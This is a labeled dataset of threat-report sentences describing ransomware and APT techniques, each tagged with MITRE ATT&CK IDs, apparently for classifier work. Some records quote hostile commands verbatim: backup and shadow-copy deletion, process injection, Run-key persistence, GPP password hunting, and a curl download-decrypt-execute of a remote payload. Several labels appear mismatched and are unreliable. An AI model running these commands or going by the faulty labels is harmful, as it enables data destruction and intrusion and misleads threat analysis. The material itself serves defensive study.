{"text1":"Actors likely used the net share command to display information about shared resources on the local computer and decide which directories to exploit, the PowerShell dir command to map shared drives to a specified path and retrieve items from another, and the ntfsinfo command to search network shares on computers they have compromised to find files of interest. The actors used dir.exe to display a list of a directory's files and subdirectories matching a certain text string.","labels":"['T1039']"}
|
|
{"text1":"The actors split collected files into approximately 3 MB chunks located on the Exchange server within the CU2\\he\\debug directory.","labels":"['T1074.002']"}
|
|
{"text1":"Conti ransomware deletes Windows Volume Shadow Copies using vssadmin.","labels":"['T1490']"}
|
|
{"text1":"Conti ransomware stops up to 146 Windows services related to security, backup, database, and email solutions through the use of net stop.","labels":"['T1489']"}
|
|
{"text1":"Conti ransomware can spread itself by infecting other remote machines via network shared drives.","labels":"['T1080']"}
|
|
{"text1":"Conti ransomware can retrieve the ARP cache from the local system by using the GetIpNetTable() API call and check to ensure IP addresses it connects to are for local, non-internet systems.","labels":"['T1016']"}
|
|
{"text1":"Using mavinject.exe (Microsoft Application Virtualization Injector), it does code injection into explorer.exe with its payload DriverGFY.db. The technique the attacker is using here is Process Injection in the Mitre ATT&CK Framework. The command executed at runtime for doing code injection is shown below: C:\\Windows\\System32\\cmd.exe\" \/c mavinject.exe 568 \/injectrunning c:\\Drivers\\DriverGFY.db\"","labels":"['T1218.013']"}
|
|
{"text1":"The script queries WMI to list all the explorer.exe processes, where it will try to inject the malicious payload. For the injection, the attackers used Mavinject (a legitimate Windows component that can be used and abused) to perform arbitrary code injections inside any running process. Mavinject.exe has been abused for several years, as indicated in this blog from 2017.","labels":"['T1218.013']"}
|
|
{"text1":"Raspberry Robin leverages rundll32.exe followed by shell32.dll and calls the ShellExec_RunDLL or ShellExec_RunDLLA functions to execute the DLL via the processes such as odbcconf.exe, msiexec.exe and control.exe.","labels":"['T1218.008', 'T1218.007', 'T1218.002', 'T1218.011']"}
|
|
{"text1":"Compiled HTML (CHM) files are commonly Microsoft help files. A CHM file is a compiled collection of HTML files that can include documents, images, scripts, etc. Attackers abuse these files by embedding malicious payloads in CHM files. CHM files can be executed by HH.exe, which is a Microsoft Windows utility. Adversaries use this technique to evade AV or application blacklisting.","labels":"['T1218']"}
|
|
{"text1":"When users run the malicious CHM file, the HTM file\u2019s code is executed. The script decompiles the CHM file through hh.exe and runs LBTWiz32.exe. It then creates a normal image file (KBSI_SNS_003.jpg) on the PC screen, making it difficult for users to recognize malicious behaviors.","labels":"['T1218']"}
|
|
{"text1":"LBTWiz32.exe that is run is a normal program. However, the malicious DLL (LBTServ.dll) created on the same path through DLL hijacking is loaded and starts operating. The malicious DLL creates and executes a malicious VBE file (ReVBShell) in the %TEMP% folder. Figures 2 to 4 show parts of the decoded VBE code.","labels":"['T1574']"}
|
|
{"text1":"Mimikatz creates a new server and nTDSDSA objects in the Active Directory forest Configuration partition. Next, it updates the SPN (Service Principal Name) of the computer hosting the rogue domain controller to \u201cGC\u201d (Global Catalog) and \u201cE3514235-4B06-11D1-AB04-00C04FC2DCD2\u201d (Active Directory Replication). The rogue domain controller is now registered and capable of replicating data to other domain controllers.","labels":"['T1207']"}
|
|
{"text1":"This is a late-stage kill chain attack that allows a threat actor with admin (domain or enterprise admin) credentials to leverage the replication mechanism in AD to register a rogue domain controller in order to inject backdoor changes into an AD domain. With that rogue DC, the attacker can manipulate AD data, including objects and schemas.","labels":"['T1207']"}
|
|
{"text1":"With DCShadow, attackers no longer have to replicate data, but can register new domain controllers in the targeted infrastructure to inject backdoor changes in AD objects, or alter existing ones by replacing the attributes\u2019 values.","labels":"['T1207']"}
|
|
{"text1":"If an attacker has domain admin permissions, he can steal the DC backup key and as a result, decrypt all the domain users\u2019 master keys. The Mimikatz module allowing to extract the domain backup key is lsadump::backupkeys. This module first calls the API functions LsaOpenPolicy with POLICY_GET_PRIVATE_INFORMATION as the DesiredAccess argument, so it will be able to call the function LsaRetrievePrivateData after-","labels":"['T1207']"}
|
|
{"text1":"The Nefilim ransomware creates a new wermgr.exe (the Windows error reporting manager) process and injects its payload to evade process-based defenses.","labels":"['T1055']"}
|
|
{"text1":"Nefilim uses WerFault.exe and wermgr.exe for DLL Side Loading, a defense evasion technique used by adversaries to execute malicious payloads by hijacking the library manifest used to load DLLs. Werfault.exe is the Windows Error Reporting binary used by many different programs to report errors.","labels":"['T1574.002']"}
|
|
{"text1":"Nefilim uses the following \u2018timeout\u2019 command to delay the execution of the \u2018del\u2019 command. Adversaries use this command also to evade sandbox analysis. C:\\Windows\\System32\\cmd.exe\" \/c timeout \/t 3 \/nobreak\"","labels":"['T1497.003']"}
|
|
{"text1":"The Nefilim ransomware uses the IsDebuggerPresent, CheckRemoteDebuggerPresent, and NtQueryInformationProcess API functions to check if a user-mode debugger is running. Debuggers are used by security analysts to inspect malware\u2019s behavior at runtime. In the presence of a debugger, malware samples exhibited less malicious behavior. Moreover, Nefilim uses the NtSetInformationThread API function to evade debugging.","labels":"['T1518.001']"}
|
|
{"text1":"Nefilim reads the hosts file (C:\\Windows\\System32\\drivers\\etc\\hosts) to get a listing of other systems by IP addresses and hostnames on the network that may be used for Lateral Movement from the current system.","labels":"['T1018']"}
|
|
{"text1":"The Nefilim ransomware downloads the Psexec.exe tool, and it also abuses the Windows built-in WMI (Windows Management Instrumentation) utility for lateral movement. PsExec is a free Microsoft tool that can be used to execute commands and binaries on remote systems and download or upload a file over a network share. Nefilim uses PsExec and WMI with hard-coded admin credentials to remotely execute the batch files and the ransomware file in remote hosts.","labels":"['T1570']"}
|
|
{"text1":"The Nefilim ransomware creates a DirectInput object using the DirectDrawCreateEx function to capture keystrokes. Keylogging is both a Credential Access and Collection tactic.","labels":"['T1056.001']"}
|
|
{"text1":"Like other ransomware threats, Nefilim encrypts files on the target system using AES-128 and adds NEFILIM, NEPHILIM, MERIN, TRAPGET, MEFILIN, TELEGRAM, SIGARETA, or OFFWHITE extension to encrypted files. It uses an RSA-2048 public key embedded in the ransomware executable to encrypt the AES encryption key. It also adds a file that includes the ransom note to the root directory, such as C:\\NEFILIM-DECRYPT.txt.","labels":"['T1486']"}
|
|
{"text1":"Deleting volume shadow copies is very typical behavior of ransomware. The Nefilim ransomware uses WMIC with the following command to delete all volume shadow copies on the system to prevent recovery. WMIC is a command-line utility to access WMI.","labels":"['T1490']"}
|
|
{"text1":"Nefilim also uses bcdedit.exe twice to disable automatic Windows recovery features by modifying boot configuration data: bcdedit \/set {default} recoveryenabled No; bcdedit \/set {default} bootstatuspolicy ignoreallfailures. Moreover, the Nefilim ransomware uses wbadmin to delete the backup catalog: wbadmin delete catalog -quiet","labels":"['T1490']"}
|
|
{"text1":"Mandiant assesses with moderate confidence that the threat actor obtained the session token from the operators of the info-stealer malware. These tokens were used by the actor via public VPN providers to authenticate to the target\u2019s Microsoft 365 environment.","labels":"['T1550.004']"}
|
|
{"text1":"To authenticate to vCenter the threat actor used a stolen session cookie for a Privileged Access Management (PAM) account.","labels":"['T1550.004']"}
|
|
{"text1":"In a particular campaign, Mandiant identified that the threat actor performed initial reconnaissance via a VPS provider located in the same region as the victim. Mandiant believes a misconfiguration by the threat actor meant that the VPN services running on the VPS stopped functioning after 8 hours.","labels":"['T1583.003']"}
|
|
{"text1":"APT41 used a malware variant called WIDETONE to conduct port scans on the specified subnets.","labels":"['T1046']"}
|
|
{"text1":"Figure 7 shows how DCRat collects the public IP address from the compromised host by accessing the IP web service named as \u201chttps[:]\/\/ipinfo[.]io\/json\u201d.","labels":"['T1590.005']"}
|
|
{"text1":"DCRat will also drop a .bat file containing a script that runs the W32tm \u201cstripchart\u201d command on the compromised host. This command is used as a delay tactic for its execution and beaconing.","labels":"['T1124']"}
|
|
{"text1":"The following analytic detects a powershell script that enumerates the camera mounted to the targeted host.","labels":"['T1592.001']"}
|
|
{"text1":"The malware creates a shortcut %APPDATA%\\dotNET.lnk pointing to the copy of the malware under %APPDATA%.","labels":"['T1547.009']"}
|
|
{"text1":"We detect the attachment file as W97M\/Adnel or MHT\/Dloader. This macro malware is usually attached in the spam emails as .doc files. It uses social engineering tricks to be able to run the malicious macro script that is disabled by default in Microsoft Office.","labels":"['T1586.001']"}
|
|
{"text1":"APT32 is widely known to use such social engineering techniques to trick a user into enabling macros, after which a file downloads multiple malicious payloads from remote servers.","labels":"['T1586.001']"}
|
|
{"text1":"We observed that the InstallUtil.exe process was being created in suspended mode. Once it started execution, we compared its memory artifacts to a benign execution of InstallUtil.exe and concluded that the malicious payload is being injected into the memory of the newly spawned InstallUtil.exe process. We also observed that no arguments are passed to InstallUtil, which would cause an error under normal execution since InstallUtil always expects at least one argument.","labels":"['T1218.004']"}
|
|
{"text1":"Version.dll and jucheck.exe are both important pieces of the execution chain used to launch BOOMMIC. Jucheck.exe is a legitimate java binary used to check for any updates. This file will load version.dll upon its execution. Version.dll is an unsigned and modified copy of a signed legitimate Windows DLL, normally found under %SYSTEMROOT%\\System32, but retains its PE header. An additional import was added to the modified version.dll, which imports the malicious function from javafx_font.dll.","labels":"['T1574.002']"}
|
|
{"text1":"Prior to executing BOOMMIC APT29 was observed creating persistence via a registry key for \u201cJava Update\u201d that would execute jucheck.exe from the directory that contained version.dll and the BOOMMIC payload. Figure 19: BOOMMIC Persistence reg add HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\" \/v \"Java Update\" \/t REG_SZ \/d \"c:\\users\\<redacted>\\appdata\\local\\Java\\jucheck.exe\"\"","labels":"['T1112', 'T1547.001']"}
|
|
{"text1":"APT29 was hunting for passwords stored in SYSVOL. This technique relies on passwords that are stored as part of Group Policy Preferences. Passwords stored in this way are encrypted using a known scheme that can easily be decrypted. APT29 GPP password datamining: C:\\WINDOWS\\system32\\cmd.exe \/C findstr \/S \/I cpassword \\\\DOMAIN\\sysvol\\DOMAIN\\policies\\*.xml","labels":"['T1003.008']"}
|
|
{"text1":"One notable TTP observed by APT29 was the hunting for passwords stored in SYSVOL. This technique relies on passwords that are stored as part of Group Policy Preferences.","labels":"['T1552.006']"}
|
|
{"text1":"Because the DLL\/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL\/EXE) to load into memory on the remote system; this will load and execute the DLL\/EXE in memory without writing any files to disk.","labels":"['T1620']"}
|
|
{"text1":"Attackers modified the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node]\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file.","labels":"['T1553']"}
|
|
{"text1":"A threat actor can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features, which rely on MOTW tagging \u2013 for example, \u2018Protected View\u2019 in Microsoft Office. This zero-day has a moderate CVSS risk score of 5.4, because it only helps to avoid the Microsoft Defender SmartScreen defense mechanism, which has no RCE or DoS functionality.","labels":"['T1553.005']"}
|
|
{"text1":"Figure 9: Call to DeleteFileW to remove the :Zone.Identifier Flag from the dropped copy.","labels":"['T1553.005']"}
|
|
{"text1":"CVE-2022-42821 allows hackers to bypass Gatekeeper by setting restrictive Access Control Lists (ACLs) using specially-crafted payloads that prohibit Safari, web downloaders or any other program through which an app is downloaded from setting com.apple.quarantine attribute to the downloaded file\/application\/software.","labels":"['T1553.001']"}
|
|
{"text1":"The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o \/tmp\/.info.enc https:\/\/github.com\/youarenick\/newProject\/raw\/master\/info.enc; openssl enc -aes-256-cbc -d -in \/tmp\/.info.enc -out \/tmp\/.info.py -k 111111qq; python \/tmp\/.info.py The first part of the command downloads an encoded file from a GitHub page belonging to a user named youarenick and saves that file to a hidden file named .info.enc in \/private\/tmp\/. Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.","labels":"['T1553.001']"}
|
|
{"text1":"To summarize, the Mach-O does the following: downloads a file from the URL supplied as an argument; decrypts this file using AES-128-ECB and TEA with a custom delta; writes the resulting file to $TMPDIR\/airportpaird and makes it executable; uses the privilege escalation exploit to remove the com.apple.quarantine attribute from the file to avoid asking the user to confirm the launch of the unsigned executable","labels":"['T1553.001']"}
|
|
{"text1":"copy %~dp0%DLL_NAME%\" \"%WORK_DIR%\" \/Y reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" \/v \"%SERVICE_NAME%\" \/t REG_MULTI_SZ \/d \"%SERVICE_NAME%\" \/f sc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share start= auto error= ignore DisplayName= \"%DISPLAY_NAME%\" SC failure \"%SERVICE_NAME%\" reset= 86400 actions=\"","labels":"['T1055']"}
|
|
{"text1":"The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL.","labels":"['T1055.012']"}
|
|
{"text1":"Carbanak also performs techniques for disabling security tools, deleting files that are left in malicious activity, and modifying registry to hide configuration information.","labels":"['T1562.001', 'T1070.004', 'T1112']"}
|
|
{"text1":"Carbanak also performs brute force tactics or takes advantage of credentials that are saved in web browsers.","labels":"['T1110']"}
|
|
{"text1":"BAT files were used to download and execute the Cring ransomware on the other systems in the compromised network. It also uses the Windows CertUtil program to help with the said download.","labels":"['T1105']"}
|
|
{"text1":"The ransomware can also get into the system through certain vulnerability exploits. The abuse of the aforementioned Adobe ColdFusion flaw (CVE-2010-2861) to enter the system is a new development for the threat. In the past, Cring was also used to exploit a FortiGate VPN server vulnerability (CVE-2018-13379).","labels":"['T1203', 'T1588.006', 'T1587.004', 'T1499.004', 'T1190', 'T1210', 'T1588.005']"}
|
|
{"text1":"Lateral movement was done through Cobalt Strike. This tool was also used to distribute BAT files that will be used later for various purposes, including impairing the system\u2019s defenses.","labels":"['T1588.002', 'T1562', 'T1570']"}
|
|
{"text1":"Monero miner scripts are downloaded from TeamTNT\u2019s server and piped to \u201cbash\u201d using a SSH session on the underlying host as the \u201croot\u201d user by supplying the private key from \u201c\/tmp\/TeamTNT.\u201d Later, the private key \u201c\/tmp\/TeamTNT\u201d is removed as well.","labels":"['T1098.004', 'T1195', 'T1588.002', 'T1059.004', 'T1021.004', 'T1552.004', 'T1588.001']"}
|
|
{"text1":"The filename changed from tru.dll to kibuyuink.exe, even though it remained a DLL and still required regsvr32.exe to run. Changing the filename extension is a common tactic seen in various malware infections.","labels":"['T1587.001', 'T1546.001']"}
|
|
{"text1":"The C&C domain android[.]viral91[.]xyz, to which the malware was connecting, also shows that the APT team very likely uses subdomains to host or connect to Android malware. In previous years, some CrimsonRAT samples were also found to be hosted on the viral91[.]xyz domain.","labels":"['T1584.001', 'T1583.001', 'T1587.001', 'T1588.001']"}
|
|
{"text1":"In one instance, FIN13 deployed a backdoor called MAILSLOT, which communicates over SMTP\/POP over SSL, sending and receiving emails to and from a configured attacker-controlled email account for its command and control. MAILSLOT makes FIN13 a rare case of a threat actor who has used email communications for C2.","labels":"['T1102.003']"}
|
|
{"text1":"In this intrusion from December 2021, the threat actors utilized IcedID as the initial access vector. IcedID is a banking trojan that first appeared in 2017; it is usually delivered via malspam campaigns and has been widely used as an initial access vector in multiple ransomware intrusions. Upon execution of\u2026","labels":"['T1219']"}
|
|
{"text1":"The cheat sheet is separated into several sections, based on the purpose of the example commands. Fortunately, the commands listed in the cheat sheet provide us with a great deal of insight into some of the tools and techniques the actors will possibly use after compromising the end system. The cheat sheet shows significant batch and PowerShell scripting and a preference for using RDP, as well as the following tools not provided natively in Windows (i.e. thc-hydra, Plink, Mimikatz, Powercat, ProcDump, SharpHound\/BloodHound and PowerSploit). Table 1 shows the headers and a description of each section within the cheat sheet.","labels":"['T1059.003', 'T1059.001']"}
|
|
{"text1":"Emotet occasionally takes a break from delivering malicious emails. Emotet's longest absence from the threat landscape occurred in early February 2020 and lasted more than five months. Emotet resumed operations in mid-July 2020, and it quickly surpassed other threats in sheer volume of malicious spam.","labels":"['T1098.002', 'T1566']"}
|
|
{"text1":"When issuing a beacon to its C2, PingPull will send an Echo Request packet to the C2 server with total and current set to 0 and will include no encoded and encrypted data, as seen in Figure 1.","labels":"['T1132', 'T1041']"}
|
|
{"text1":"Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and the Mettle open source control module. Hajime: This round of updates from Hajime also includes GPON exploits. Two Mirai variants: At least two malicious campaigns are actively exploiting this vulnerability to propagate Mirai variants; the second one is already known as Omni. Imgay: This looks like a botnet under development. We only observe its download behavior and no further follow-up actions.","labels":"['T1588.006', 'T1587.004', 'T1203', 'T1595.002']"}
|
|
{"text1":"CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.","labels":"['T1083']"}
|
|
{"text1":"The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely invoke an encoded PowerShell command on target systems to execute the payload","labels":"['T1059.001', 'T1570']"}
|
|
{"text1":"Attempts to dump the contents of \/etc\/passwd and \/etc\/shadow to enable offline password cracking.","labels":"['T1003.008', 'T1110.002']"}
|
|
{"text1":"Five minutes after the automated reconnaissance activities are completed, the QAKBOT-injected wermgr.exe process drops the Brute Ratel DLL and invokes it via a rundll32.exe child process with the \u201cmain\u201d export function.","labels":"['T1218.011']"}
|
|
{"text1":"Unit 42 has been tracking an APT campaign we name TiltedTemple, which we first identified in connection with its use of the Zoho ManageEngine ADSelfService Plus vulnerability CVE-2021-40539 and ServiceDesk Plus vulnerability CVE-2021-44077.","labels":"['T1588.006']"}
|
|
{"text1":"Vidar is an info-stealer. It downloads DLL files freebl3.dll, mozglue.dll, msvcp140.dll, nss3.dll, softokn3.dll and vcruntime140.dll from its C&C for use in password-grabbing routines.","labels":"['T1588.001']"}
|
|
{"text1":"DanaBot is a modular malware that includes various additional modules; the most popular functionalities of these modules are stealing information from compromised machines and injecting fake forms into popular ecommerce and social media sites to collect payment data. It can also provide full access to infected systems with remote desktop, or mouse and keyboard access by utilizing a VNC plugin.","labels":"['T1021.005', 'T1592']"}
|
|
{"text1":"QAKBOT can use Regsvr32 to execute malicious DLLs","labels":"['T1218.010', 'T1588.002']"}
|
|
{"text1":"LockBit 2.0 has been seen utilizing numerous tools to dump passwords from password stores and Chrome using GrabChrome and GrabRFF.","labels":"['T1555', 'T1555']"}
|
|
{"text1":"Adds registry run keys to achieve persistence. In some cases, we observed using the following command: start cmd.exe \/k runonce.exe \/AlternateShellStartup","labels":"['T1547.001']"}
|
|
{"text1":"Further reconnaissance is performed in the environment to identify privileged users. First, the built-in net.exe and nltest.exe are used.","labels":"['T1033']"}
|
|
{"text1":"Volexity reported yesterday that its analysts had identified approximately 1,600 ZCS servers that they believe were compromised by threat actors leveraging CVE-2022-41352 to plant webshells","labels":"['T1588.006']"}
|
|
{"text1":"PrivateLoader is yet another example of a Pay-Per-Install malicious loader like LgoogLoader and SmokeLoader. It uses a single-byte XOR encryption key to receive URLs from the control center.","labels":"['T1587.001']"}
|
|
{"text1":"MedusaLocker is a ransomware family that was first seen in the wild in early October 2019. In January 2020, a fork of MedusaLocker named Ako was observed, which has been updated to support the use of a Tor hidden service to facilitate a RaaS model. Operators of the Ako version of the malware have since implemented a DLS (Figure 12). At least nine victims have been published to the site since its inception.","labels":"['T1588.001']"}
|
|
{"text1":"However, the program turned out not to be a Gpcode variant. This new version of Bancos.aam turned out to be the first Trojan spy program designed to steal data from users of the Russian QUIK system. ","labels":"['T1587.001']"}
|
|
{"text1":"On Tuesday, Jan. 11, 2022, Emotet resumed spamming after its holiday break. The emails continued with links to fake complaint pages, and the pages were sometimes customized to include the recipient\u2019s name. This method was prevalent until Jan. 20.","labels":"['T1566.002', 'T1566.002']"}
|
|
{"text1":"NotPetya has the capability to exploit SMBv1 via the well known EternalBlue exploit. Once the exploit is launched, the shellcode will end up writing the file and executing the malware on the target machine.","labels":"['T1203']"}
|
|
{"text1":"CVE-2018-4878 was the second most commonly observed vulnerability and is the only Adobe Flash Player vulnerability on this year\u2019s top 10. Like CVE-2018-8174, this vulnerability was included in multiple exploit kits, most notably the Fallout exploit kit, which was used to distribute GandCrab ransomware. Fallout took its name and URI patterns from the now defunct Nuclear exploit kit, which had been associated with CVE-2015-7645, one of 2016\u2019s top 10 vulnerabilities. In 2018, Fallout was last selling for $300 a week and $1,100 a month, as seen below.","labels":"['T1203', 'T1588.005']"}
|
|
{"text1":"In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner. On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine. In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets. In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner. On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.","labels":"['T1588.001']"}
|
|
{"text1":"Enabling the macros starts a multi-stage infection chain that eventually downloads and executes a Cobalt Strike beacon, providing the attackers with a foothold inside the target organization.","labels":"['T1588.002']"}
|
|
{"text1":"Kaspersky Lab detections for Blue, Black, and Green Lamberts have been triggered by a relatively small set of victims from around the world. While investigating one of these infections involving White Lambert (network-driven implant) and Blue Lambert (active implant), we found yet another family of tools that appear to be related. We called this new family \u2018Pink Lambert\u2019.","labels":"['T1587.001']"}
|
|
{"text1":"In most cases, UNC2165 has stolen data from its victims to use as leverage for extortion after it has deployed ransomware across an environment. In intrusions where the data exfiltration method could be identified, there is evidence to suggest the group used either Rclone or MEGASync to transfer data from the victims' environments prior to encryption. The Rclone utility is used by many financially motivated actors to synchronize sensitive files with cloud storage providers, and MEGASync synchronizes data to the MEGA cloud hosting service.","labels":"['T1537']"}
|
|
{"text1":"The Ryuk group went from an email to domain wide ransomware in 29 hours and asked for over $6 million to unlock our systems. They used tools such as Cobalt Strike, AdFind, WMI, vsftpd, PowerShell, PowerView, and Rubeus to accomplish their objective.","labels":"['T1588.002', 'T1059.001']"}
|
|
{"text1":"On March 5, 2020, researcher Steven Seeley published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload \u201clogger.zip\u201d, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.","labels":"['T1203']"}
|
|
{"text1":"Uploads a file on the victim\u2019s computer to the C&C server","labels":"['T1041']"}
|
|
{"text1":"Uses Mimikatz to harvest credentials.","labels":"['T1003.001', 'T1003.001']"}
|
|
{"text1":"Prior to encryption, the ransomware checks if the directory is in the root path and avoids the following files and directories","labels":"['T1083']"}
|
|
{"text1":"Enumerates remote open SMB network shares","labels":"['T1135']"}
|
|
{"text1":"Uses legitimate VPN or Citrix credentials to maintain access to an environment.","labels":"['T1133']"}
|
|
{"text1":"Uses tools such as PDQ Inventory scanner, Advanced Port Scanner and netscan (which also scanned for the ProxyShell vulnerability).","labels":"['T1046']"}
|
|
{"text1":"The group abuses common cloud services such as Dropbox, OneDrive, and Mega for C&C communications (receive commands and exfiltrate data).","labels":"['T1136.003']"}
|
|
{"text1":"Instead of more traditional malware like a Windows executable (.exe) or Dynamic Link Library (.dll), the malware authors used a browser extension as their final payload","labels":"['T1176']"}
|
|
{"text1":"Uses 7-Zip to compress stolen data for exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"Stolen digital certificate re-use","labels":"['T1588.004']"}
|
|
{"text1":"FormatLoader\u2019s main purpose is to infect the machine with an additional malicious file by downloading the binary to the compromised machine. To do so, the malware adds digits from the hardcoded range one by one to the hardcoded format strings, and accesses the download links.","labels":"['T1105']"}
|
|
{"text1":"In its new attack, the actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document.","labels":"['T1566.001']"}
|
|
{"text1":"Exploits Print Nightmare vulnerability.","labels":"['T1068']"}
|
|
{"text1":"Even more, this tiny bootkit with a size of only 80 kb on disk after installation can disable built-in Windows security protection such as Hypervisor-Protected Code Integrity (HVCI) and Windows Defender and bypass User Account Control (UAC).","labels":"['T1548.002']"}
|
|
{"text1":"Most PowerShell scripts involved in LockBit 2.0 cases are Base64 encoded.","labels":"['T1140']"}
|
|
{"text1":"Although Cobalt Strike has many capabilities beneficial to threat actors in ransomware attacks, it was mainly seen in LockBit 2.0 investigations acting as a command and control beacon, a method of lateral movement and a tool for downloading\/executing files.","labels":"['T1021']"}
|
|
{"text1":"BlackMatter harvests credentials from Local Security Authority Subsystem Service (LSASS) memory using procmon.","labels":"['T1003.001']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.","labels":"['T1189']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed: - Using cmd.exe, JavaScript\/Jscript Interpreter, and network device command line interpreters (CLI). - Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. - Employing Python scripts to exploit vulnerable servers. - Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.","labels":"['T1059.001', 'T1059.003', 'T1059.004', 'T1059.006', 'T1059.007', 'T1059.008']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed deleting files using rm or del commands. Several files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created\/used.","labels":"['T1070']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using commands, including tasklist, jobs, ps, or taskmgr, to reveal the running processes on victim devices.","labels":"['T1057']"}
|
|
{"text1":"Chinese state-sponsored cyber actors used RDP and executed rdpclip.exe to exfiltrate information from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances, Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.","labels":"['T1105']"}
|
|
{"text1":"Chinese state-sponsored cyber actors have been observed using tools like dog-tunnel and dns2tcp.exe to conceal C2 traffic with existing network activity.","labels":"['T1572']"}
|
|
{"text1":"The actors used a PowerShell cmdlet (New-ManagementRoleAssignment) to grant the 'ApplicationImpersonation' role to a compromised account.","labels":"['T1098.002']"}
|
|
{"text1":"The actors used the ntdsutil.exe utility, which was present on a target's Active Directory\u00ae server to export the Active Directory database for credential access.","labels":"['T1003.003']"}
|
|
{"text1":"The actors used a variety of utilities, including publicly available versions of WinRAR\u00ae, to archive collected data with password protection.","labels":"['T1560.001']"}
|
|
{"text1":"The actors used certutil.exe, a known \"Living Off the Land\" technique, to transfer a file into a target environment.","labels":"['T1115']"}
|
|
{"text1":"The Iranian government-sponsored APT actors may have made modifications to the Task Scheduler. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity: SynchronizeTimeZone, GoogleChangeManagement, MicrosoftOutLookUpdater, MicrosoftOutLookUpdateSchedule","labels":"['T1053.005']"}
|
|
{"text1":"Actors used the taskkill command to probably disable security features. CISA was unable to determine which application was associated with the Process ID.","labels":"['T1562.001']"}
|
|
{"text1":"The part of the malicious code that drops and executes a payload is nearly identical between the two samples. The legitimate Windows executable C:\\Windows\\System32\\colorcpl.exe is copied to the new directory C:\\ProgramData\\PackageColor and the embedded payload is written to C:\\ProgramData\\PackageColor\\colorui.dll.","labels":"['T1218']"}
|
|
{"text1":"Either via the LNK after startup, or directly via the VBS, the command line \u201cwscript.exe \/\/B \/\/E:vbs C:\\Users\\Public\\Favorites\\desktop.ini\u201d is executed, referencing the helper file dropped by the sample mentioned above. Finally, the file C:\\Users\\Public\\ignit.vbs is deleted after execution.","labels":"['T1547.009']"}
|
|
{"text1":"\u201cdesktop.ini\u201d is used to invoke regasm.exe to launch the payload found in C:\\Users\\Public\\Libraries\\core.dll as a hidden window without returning any error codes.","labels":"['T1622']"}
|
|
{"text1":"The actor's CovalentStealer tool stores collected files on a Microsoft OneDrive cloud folder.","labels":"['T1567.002']"}
|
|
{"text1":"The Chrome extension is installed and maintained by a number of plist files written to the user directory ~\/Library\/LaunchAgent\/. To conceal the malicious behavior, the underlying commands in the plist files are obfuscated with Base64 encoding.","labels":"['T1647']"}
|
|
{"text1":"The first plist, ~\/Library\/LaunchAgents\/com.safarii.extension.plist, does not use a StartInterval value like the Chrome variant, but instead uses RunAtLoad. The RunAtLoad parameter is executed when the user logs into their computer. Note that the plist file does not use the correct spelling of Safari. ","labels":"['T1647']"}
|
|
{"text1":"An attacker runs the MimiKatz tool and launches a DCShadow attack (lsadump::dcshadow)","labels":"['T1207']"}
|
|
{"text1":"The Nefilim ransomware uses a batch file to stop services and kill processes in the local host. This batch file abuses taskkill.exe using CMD to kill predefined services and processes in the target host. Nefilim distributes this batch file to multiple hosts using two batch files. One of the batch files uses the \u2018copy\u2019 command, and the other one uses WMI with hard-coded admin credentials.","labels":"['T1562.001']"}
|
|
